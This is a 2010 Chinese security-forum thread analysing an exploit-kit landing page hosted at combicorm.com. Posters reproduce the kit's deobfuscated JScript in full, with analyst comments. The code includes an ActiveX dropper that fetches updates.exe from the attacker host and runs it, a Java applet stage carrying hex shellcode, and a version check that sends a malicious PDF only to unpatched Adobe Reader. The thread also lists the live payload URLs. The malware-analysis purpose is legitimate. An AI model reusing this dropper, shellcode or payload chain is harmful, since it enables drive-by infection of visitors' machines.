
250662772 - 2010-5-14 14:00:00


引用:

http://combicorm.com/vkeo2/
->http://combicorm.com/vkeo2/load.php?spl=java_gsb&;h=  (exe)
->http://combicorm.com/vkeo2/pdf.php?h= (pdf)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_new (exe)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_email (exe)
-->http://combicorm.com/vkeo2/load.php?spl=pdf_geticon (exe)

网页分析:250662772


附件: 首页代码+pdf文件.rar
湖心小筑 - 2010-5-16 11:26:00
// Landing-page driver as recovered by the analyst (IE/JScript, ActiveX-based). Code is unchanged;
// the line breaks and comments below are analysis notes for reading it, nothing else is altered.
// Download URL of the "mdac" stage (matches the load.php?spl=mdac line in the decode log below).
var RnzUCwiygew='http://combicorm.com/vkeo2/load.php?spl=mdac&h=';
// Tries six CreateObject/GetObject call shapes on the supplied ActiveX host object until one returns
// an instance for the requested ProgID. Every failure is swallowed, so a null return is the only error signal.
function KFh4Y0g7Cp7(ajE74k6aKNq,sO94PWkQXlO){var z4Kici2L180=null;try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO)}catch(e){}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO,"")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.CreateObject(sO94PWkQXlO,"","")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject("",sO94PWkQXlO)}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject(sO94PWkQXlO,"")}catch(e){}}if(!z4Kici2L180){try{z4Kici2L180=ajE74k6aKNq.GetObject(sO94PWkQXlO)}catch(e){}}return(z4Kici2L180);}
// Dropper: synchronous GET of RnzUCwiygew, binary body written through ADODB.Stream to
// "updates.exe" under FileSystemObject special folder 2 (the temporary folder), then launched with
// Shell.Application.ShellExecute. Returns 1 on success and 0 only when no HTTP object could be
// created; any other failure propagates to the caller. The ProgID strings are spliced with "+",
// apparently to defeat plain string matching. Observable pattern for detection: Shell.Application,
// ADODB.Stream and an XMLHTTP client all obtained through a third-party ActiveX object, followed by a
// write to %TEMP%\updates.exe.
function ybLwJKcxGxD(N8x9jVcK3s4){
// implicit global (no var): file name of the drop
jz825hLSYrq="updates.exe";
var P1l9grKWyXZ=N8x9jVcK3s4.CreateObject("Scripting.FileSystemObject","");
var sap=KFh4Y0g7Cp7(N8x9jVcK3s4,"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on");
var CvFDfgkQ5bY=KFh4Y0g7Cp7(N8x9jVcK3s4,"ADODB.Stream");
var BFC1HX2Og21=null;
jz825hLSYrq=P1l9grKWyXZ.BuildPath(P1l9grKWyXZ.GetSpecialFolder(2),jz825hLSYrq);
// ADODB.Stream Mode 3 = read/write
CvFDfgkQ5bY.Mode=3;
// HTTP client candidates, tried in order: Microsoft.XMLHTTP, MSXML2.XMLHTTP, MSXML2.ServerXMLHTTP, native XMLHttpRequest.
try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"Mic"+"ro"+"so"+"ft.XM"+"LH"+"T"+"TP");BFC1HX2Og21.open("G"+"ET",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"MSX"+"M"+"L2.XML"+"HT"+"TP");BFC1HX2Og21.open("GE"+"T",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=KFh4Y0g7Cp7(N8x9jVcK3s4,"M"+"SX"+"ML2.Se"+"rv"+"erX"+"MLHT"+"TP");BFC1HX2Og21.open("GET",RnzUCwiygew,false);}catch(e){try{BFC1HX2Og21=new XMLHttpRequest();BFC1HX2Og21.open("GET",RnzUCwiygew,false);}catch(e){return 0;}}}}
// Type 1 = binary stream
CvFDfgkQ5bY.Type=1;
BFC1HX2Og21.send(null);
// implicit global (no var): raw response bytes
rb=BFC1HX2Og21.responseBody;
// SaveToFile option 2 = create/overwrite
CvFDfgkQ5bY.Open();CvFDfgkQ5bY.Write(rb);CvFDfgkQ5bY.SaveTofile(jz825hLSYrq,2);
sap.ShellExecute(jz825hLSYrq);
return 1;}
// Walks a CLSID list (null-terminated), creates an <object> for each, and runs the dropper through the
// first one from which a Shell.Application instance can be obtained. The CLSIDs are reproduced as found;
// beyond the stage name "mdac", which product each belongs to is not established on this page.
// Errors per CLSID are swallowed; the function returns 1 on success and undefined otherwise.
function mdac(){var pjHXMcaEgqD=0;var NxJLZHcXUaXd=new Array('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
while(NxJLZHcXUaXd[pjHXMcaEgqD]){var N8x9jVcK3s4=null;N8x9jVcK3s4=document.createElement("object");N8x9jVcK3s4.setAttribute("classid","clsid:"+NxJLZHcXUaXd[pjHXMcaEgqD]);if(N8x9jVcK3s4){try{var srIVDk45akz=KFh4Y0g7Cp7(N8x9jVcK3s4,"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on");if(srIVDk45akz){if(ybLwJKcxGxD(N8x9jVcK3s4))return 1;}}catch(e){}}pjHXMcaEgqD++;}}
// The three stages are scheduled with increasing delays (200 ms, 3 s, 7 s) via string-form setTimeout.
setTimeout("mdac();",200);
// Java stage: injects an <applet> (class "AppleT", archive "1.jar" — the archive is not on this page)
// with one <param name="sc"> holding a hex string. The tail of that string (…687474703a2f2f…) is the
// ASCII of http://combicorm.com/vkeo2/load.php?spl=java_gsb&h=, the URL the thread lists as the Java
// stage, so the parameter carries the payload address for the applet; the bytes before it are not
// decoded here.
function java_gsb(){    var javaelem = document.createElement("applet");var paramelem = document.createElement("param");paramelem.setAttribute("name", "sc");paramelem.setAttribute("value", "9033c0648b4030780c8b400c8b701cad8b5808eb098b40348d407c8b583c6a445ad1e22be28beceb4f5a5283ea5689550456578b733c8b74337803f3568b762003f333c9495041ad33ff360fbe140338f27408c1cf0d03fa40ebef583bf875e55e8b462403c3668b0c488b561c03d38b048a03c35f5e50c38d7d085752b833ca8a5be8a2ffffff32c08bf7f2ae4fb8652e6578ab669866abb06c8ae09850686f6e2e646875726c6d54b88e4e0eecff5504935033c05050568b550483c27f83c2315250b8361a2f70ff55045b33ff5756b898fe8a0eff550457b8efcee060ff5504687474703a2f2f636f6d6269636f726d2e636f6d2f766b656f322f6c6f61642e7068703f73706c3d6a6176615f67736226683d");javaelem.setAttribute("code", "AppleT");javaelem.setAttribute("archive", "1.jar");javaelem.setAttribute("width", "100%");javaelem.setAttribute("height", "100%");javaelem.appendChild(paramelem);document.body.appendChild(javaelem);  }
setTimeout("java_gsb();",3000);
// PDF stage: creates the Adobe Reader browser control (clsid CA8A9780-…), reads GetVersions() through
// the IE id-as-global "jdf1", and loads pdf.php in a 200x200 iframe only when the parsed version is
// >= "7" and < "7.1.4", >= "8" and < "8.1.7", or >= "9" and < "9.4" — i.e. the server-side PDF is
// served only to version ranges the kit considers unpatched. The comparisons are on strings, so they
// are lexicographic, not numeric ("9.10" sorts below "9.4"). The outer catch swallows every error,
// including the control being absent.
function pdf_ie(){try{var pdfObject = document.createElement("OBJECT");pdfObject.setAttribute("id", "jdf1");pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");document.body.appendChild(pdfObject);var ver = jdf1.GetVersions();ver = ver.split(",");ver = ver[1].split("=");ver = ver[1];if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >= "9") && (ver < "9.4"))){var pdfelement = document.createElement("iframe");pdfelement.setAttribute("src", "http://combicorm.com/vkeo2/pdf.php?h=");pdfelement.setAttribute("width", 200);pdfelement.setAttribute("height", 200);document.body.appendChild(pdfelement);}}catch(e){}}
setTimeout("pdf_ie();",7000);


关于:hxxp://combicorm.com/vkeo2/解密的日志(全体输出 -  6):

Level  0>http://combicorm.com/vkeo2/
Level  1>http://combicorm.com/vkeo2/load.php?spl=mdac&;h=
Level  1>http://combicorm.com/vkeo2/pdf.php?h=
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_geticon
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_email
Level  2>http://combicorm.com/vkeo2/load.php?spl=pdf_new

日志由 Redoce2.0第91次修正版于 2010-5-17 13:01:38 生成。
长门有希 - 2010-5-17 17:16:00
问一下....
把这个NeAHLlM(YNxmZ3(UspYYX));");改成eval(YNxmZ3(UspYYX));");
解出来的怎么是这样子?
// Decoded layer posted by the asker (code unchanged, only line breaks and notes added).
// Jot62n reads the decode key from the innerHTML of element 'a6TP7FgN', which is not on this page;
// YNxmZ3 decodes only when that key equals 78 and otherwise returns ''. Two visible reasons the
// output can look wrong when this is run outside the original page: with the key element missing,
// parseInt yields NaN, the check fails and the result is empty; and the loop passes the whole array to
// String.fromCharCode instead of HF5cprVD[i], so every iteration appends the same character —
// whether that index was lost in transcription cannot be told from here. UspYYX is defined elsewhere.
function Jot62n(){jZ1R6=parseInt(document.getElementById('a6TP7FgN').innerHTML);return jZ1R6;}
function YNxmZ3(HF5cprVD){var WXQ3N5=Jot62n(); BeIfH=''; if (WXQ3N5==78) for(var i=0;i<HF5cprVD.length;i++){BeIfH +=String.fromCharCode(HF5cprVD);} return BeIfH;}
// Appends the decoded text to the clipboard (IE-only clipboardData API) — presumably the analyst's own hook for extracting the next layer.
window.clipboardData.setData('Text',clipboardData.getData('Text')+YNxmZ3(UspYYX));
1